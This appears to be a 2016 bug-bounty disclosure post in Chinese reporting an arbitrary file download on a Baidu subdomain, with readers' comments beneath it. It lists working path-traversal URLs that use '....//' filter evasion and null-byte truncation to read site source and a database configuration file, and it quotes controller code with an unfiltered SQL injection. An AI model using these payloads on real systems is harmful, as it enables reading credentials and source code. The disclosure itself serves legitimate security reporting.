百度分站任意文件下载/信息泄露/SQL注入

1 游览百度分站的时这个链接引起了我的注意http://tiyan.baidu.com/static/img.php?s=15,15&n=icon-info.png

左后一个参数是一个文件，会不会存在任意文件下载呢。

依次访问一下连接均返回正常图片

http://tiyan.baidu.com/static/img.php?s=15,15&n=/icon-info.png

http://tiyan.baidu.com/static/img.php?s=15,15&n=./icon-info.png

http://tiyan.baidu.com/static/img.php?s=15,15&n=../icon-info.png

当访问http://tiyan.baidu.com/static/img.php?s=15,15&n=....//icon-info.png 连接的时候图片却不正常显示了。

这里说明很有可能是将../给替换了。....// 替换../还是会返回上级目录 所以文件不存在

访问路径http://tiyan.baidu.com/static/img.php?s=16,40&n=....//....//index.php%00.png 加上截断

成功读取首页文件

有了首页文件就可以通过里面的结构来读取其他文件了。

http://tiyan.baidu.com/static/img.php?s=16,40&n=....//....//....//....//....//....//....//home/bae/bae/phplib/config/BaeMysqlConfigure.class.php%00.png读取数据库连接

多个数据库都是同一个账户信息，只可惜在内网没法连接哦

2 这个系统使用了yii框架其大概的目录结构为

http://tiyan.baidu.com/?r=site/home 这个页面对于的控制代码为http://tiyan.baidu.com/static/img.php?s=16,40&n=....//....//protected/controllers/SiteController.php%00.png

简单看了下代码发现PlazaController.php页面的option 参数没有过滤 存在SQL注入

public function actionVoteSubmit() {
         $voteId = intval($_POST['vote_id']);
         $options = $_POST['option'];
         if(!$options || count($options) == 0) {
             $this->redirect($this->createUrl('plaza/viewVote', array('id' => $voteId)));
         }
 
         $vote  = ActVote::model()->findByPk($voteId);
 
         // 0.0 判断该用户是否参加过在投票
         $hasVoted = ActVoteRecord::model()->hasVoted($this->user->id, $voteId);
         if($hasVoted) {
             $this->redirect($this->createUrl('plaza/viewVote', array('id' => $voteId)));
         }
 
         // 0.1 判断是否为多选并且该投票有限制多选的最多数量，如果超过，则截取前$vote->limit_num个
         if($vote->type == ActVote::TYPE_MULTI && $vote->limit_num > 0) {
             if(count($options) > $vote->limit_num) {
                 $options = array_slice($options, 0, $vote->limit_num);
             }
         }
 
         // 1.1 选项选中数(selected_num) +1 & 投票的participate_num + 1
         $strOptionIds = implode(',', $options);
         $voteItem = new ActVoteItem();
         $voteItem->updateCounters(array(
             'selected_num' => 1
         ), "id in ({$strOptionIds})");

3 最后看下文件img.php果然是把../ 替换了，

http://tiyan.baidu.com/static/img.php?s=16,40&n=....//....//static/img.php%00.png

修复

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-04-20 10:26

厂商回复：

感谢您关注百度安全！

最新状态：

暂无

1. 2016-04-20 07:49 | 小良不能说的秘密 ( 实习白帽子 | Rank:36 漏洞数:15 | 一直等待与你再见一面)

   0

   666

   1# 回复此人

2. 2016-04-20 09:01 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

   0

   唉。。挖不到洞了。。

   2# 回复此人

3. 2016-04-20 21:02 | erhuo ( 普通白帽子 | Rank:164 漏洞数:39 | 666)

   0

   @hear7v 大兄弟，你差1rank就是普通白帽子了

   3# 回复此人

4. 2016-04-20 23:32 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

   0

   @erhuo shide

   4# 回复此人

5. 2016-04-21 16:50 | zowie ( 实习白帽子 | Rank:84 漏洞数:16 | Z先生)

   0

   这个人好厉害~求抱大腿

   5# 回复此人

6. 2016-05-10 12:53 | whynot ( 普通白帽子 | Rank:678 漏洞数:136 | 为你解冻冰河 为你放弃世界有何不可)

   0

   表哥真厉害、

   6# 回复此人

7. 2016-06-04 12:25 | 欧尼酱 ( 路人 | Rank:15 漏洞数:7 | 技术马马虎虎)

   0

   抱腿。。。

   7# 回复此人